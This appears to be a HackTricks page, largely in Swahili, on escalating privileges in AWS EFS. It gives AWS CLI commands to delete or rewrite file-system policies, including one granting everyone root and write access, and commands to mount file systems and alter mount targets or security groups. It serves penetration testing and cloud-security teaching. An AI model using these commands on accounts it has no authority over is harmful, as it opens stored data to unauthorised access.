AWS - EFS Privesc

Reading time: 4 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

EFS

Taarifa zaidi kuhusu EFS iko:

AWS - EFS Enum

Kumbuka kwamba ili kuunganisha EFS unahitaji kuwa katika subnetwork ambapo EFS imefunuliwa na kuwa na ufikiaji kwake (security groups). Ikiwa hili linatokea, kwa default utakuwa na uwezo wa kuunganisha; hata hivyo, ikiwa imehifadhiwa na IAM policies unahitaji ruhusa za ziada zilizotajwa hapa ili kuifikia.

elasticfilesystem:DeleteFileSystemPolicy|elasticfilesystem:PutFileSystemPolicy

Kwa moja ya ruhusa hizo, mshambuliaji anaweza kubadilisha sera ya file system ili kukupa ufikiaji kwake, au kuifuta tu ili ufikiaji wa chaguo-msingi utolewe.

Ili kufuta sera:

bash
aws efs delete-file-system-policy \
--file-system-id <value>

Kuibadilisha:

json
aws efs put-file-system-policy --file-system-id <fs-id> --policy file:///tmp/policy.json

// Give everyone trying to mount it read, write and root access
// policy.json:
{
"Version": "2012-10-17",
"Id": "efs-policy-wizard-059944c6-35e7-4ba0-8e40-6f05302d5763",
"Statement": [
{
"Sid": "efs-statement-2161b2bd-7c59-49d7-9fee-6ea8903e6603",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": [
"elasticfilesystem:ClientRootAccess",
"elasticfilesystem:ClientWrite",
"elasticfilesystem:ClientMount"
],
"Condition": {
"Bool": {
"elasticfilesystem:AccessedViaMountTarget": "true"
}
}
}
]
}

elasticfilesystem:ClientMount|(elasticfilesystem:ClientRootAccess)|(elasticfilesystem:ClientWrite)

Kwa ruhusa hii mshambuliaji ataweza mount the EFS. Kama write permission haijatolewa kwa chaguo-msingi kwa kila mtu anayeweza mount the EFS, atapata tu read access.

bash
sudo mkdir /efs
sudo mount -t efs -o tls,iam  <file-system-id/EFS DNS name>:/ /efs/

Ruhusa za ziada elasticfilesystem:ClientRootAccess na elasticfilesystem:ClientWrite zinaweza kutumika kuandika ndani ya filesystem baada ya kuunganishwa na kupata mfumo huo wa faili kama root.

Potential Impact: Indirect privesc kwa kupata taarifa nyeti ndani ya file system.

elasticfilesystem:CreateMountTarget

Ikiwa mshambuliaji yuko ndani ya subnetwork ambapo hakuna mount target ya EFS, anaweza tu kuunda moja kwenye subnet yake kwa ruhusa hii:

bash
# You need to indicate security groups that will grant the user access to port 2049
aws efs create-mount-target --file-system-id <fs-id> \
--subnet-id <value> \
--security-groups <value>

Athari Inayowezekana: Indirect privesc kwa kupata taarifa nyeti katika mfumo wa faili.

elasticfilesystem:ModifyMountTargetSecurityGroups

Katika tukio ambako mshambuliaji anagundua kwamba EFS ina mount target kwenye subnetwork yake lakini hakuna security group inayoruhusu traffic, anaweza tu kubadilisha hilo kwa kurekebisha security groups zilizochaguliwa:

bash
aws efs modify-mount-target-security-groups \
--mount-target-id <value> \
--security-groups <value>

Athari Inayowezekana: Isiyo ya moja kwa moja privesc kwa kupata taarifa nyeti katika mfumo wa faili.

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks